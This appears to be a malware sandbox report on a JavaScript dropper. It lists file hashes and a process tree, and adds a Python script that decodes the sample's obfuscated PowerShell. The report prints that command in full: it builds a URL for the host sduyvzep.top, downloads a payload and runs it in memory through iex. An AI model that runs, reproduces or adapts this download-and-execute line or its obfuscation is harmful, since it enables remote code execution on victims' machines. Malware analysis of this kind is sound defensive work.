Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
  • submitted
    31/10/2023, 20:21

General

  • Target

    NQRX0468_5871143.js

  • Size

    270KB

  • MD5

    a2e2da4033a7080a9b5d3fa24d150a8e

  • SHA1

    285433bc8135b46f468fb6d0c374c482b164e938

  • SHA256

    968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727

  • SHA512

    9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908

  • SSDEEP

    1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro. Here the parent is wscript.exe running the submitted .js, which launched a PowerShell one-liner (see Processes below).

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js
    PID:2888
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
      PID:2812
      Signature: Process spawned unexpected child process
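
    The PowerShell child above builds its download URL at runtime rather than carrying it as a string: every integer in the array minus 8593 is one ASCII character, `cu` plus the variable holding 'rl' is aliased to zwert (curl is a built-in Windows PowerShell alias for Invoke-WebRequest, and -useb abbreviates -UseBasicParsing), and `[char](9992-9887)+'ex'` spells iex, so whatever the server returns is executed in memory. The `$dosvorv` array, `$jlcbwxstuopf[2]` and `$five` are never read; they are padding. The decoder below is an added analysis example, not part of the sandbox report or of the sample: it parses the command line exactly as printed in the report, replays the subtraction, and also brute-forces the offset for the case where the constant itself is obfuscated. The regular expressions and the "looks like a domain" heuristic are this example's own assumptions.

```python
import re
import string
from typing import List, Optional

# Command line of the powershell child process, copied from the sandbox report above.
# The integer array, the -8593 offset, the decoy array and the curl/iex construction
# are the sample's own; everything else in this file is added analysis code.
CMDLINE = r"""powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)"""

# Printable ASCII without the whitespace control characters.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")
# Heuristic (an assumption of this example): the loop feeds a downloader, so the
# decoded text should contain something that looks like a host name.
DOMAIN_RE = re.compile(r"[a-z0-9-]+\.[a-z]{2,}")


def extract_int_array(cmd: str) -> List[int]:
    """Pull the first parenthesised, comma-separated list of integers out of the command line."""
    m = re.search(r"\((\d+(?:,\d+)+)\)", cmd)
    if not m:
        raise ValueError("no integer array found")
    return [int(x) for x in m.group(1).split(",")]


def extract_offset(cmd: str) -> int:
    """Find the constant subtracted inside [char]($var-N); that constant is the per-character key."""
    m = re.search(r"\[char\]\(\$\w+-(\d+)\)", cmd)
    if not m:
        raise ValueError("no [char]($var-N) subtraction found")
    return int(m.group(1))


def decode(ints: List[int], offset: int) -> str:
    """Replay the foreach loop: each element minus the offset is one character of the URL."""
    return "".join(chr(i - offset) for i in ints)


def likely_offsets(ints: List[int]) -> List[int]:
    """If the offset is hidden, try every offset that keeps all bytes in printable ASCII
    and keep only those whose output contains a domain-like token."""
    lo, hi = max(ints) - 126, min(ints) - 32
    hits = []
    for off in range(lo, hi + 1):
        text = decode(ints, off)
        if all(c in PRINTABLE for c in text) and DOMAIN_RE.search(text):
            hits.append(off)
    return hits


def resolve_char_arith(cmd: str) -> List[str]:
    """Resolve literal [char](A-B) constants, such as the 'i' glued to 'ex' to spell iex."""
    return [chr(int(a) - int(b)) for a, b in re.findall(r"\[char\]\((\d+)-(\d+)\)", cmd)]


def resolve_alias(cmd: str) -> Optional[str]:
    """Rebuild 'new-alias <name> <prefix>$var' where $var was assigned a literal string earlier."""
    m = re.search(r"\$(\w+)='(\w+)';.*?new-alias\s+\w+\s+(\w*)\$(\w+)", cmd)
    if not m or m.group(1) != m.group(4):
        return None
    return m.group(3) + m.group(2)


if __name__ == "__main__":
    ints = extract_int_array(CMDLINE)
    off = extract_offset(CMDLINE)
    print("offset:", off, "decoded:", decode(ints, off))
    print("aliased command:", resolve_alias(CMDLINE), "invoker:", resolve_char_arith(CMDLINE))
    print("brute-forced offsets:", likely_offsets(ints))
```

    Running it against the report's command line yields the plain URL `sduyvzep.top/1.php?hash=` (with an empty hash parameter), the alias `curl`, and the single character `i`; the brute-force path recovers 8593 as the only offset that produces a domain-like string, which is the check to reach for when the subtraction constant is itself computed or split across variables. The decoded host is the indicator to pivot on, since the sandbox's Network tab above recorded nothing for this run.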

    Network

    MITRE ATT&CK Matrix
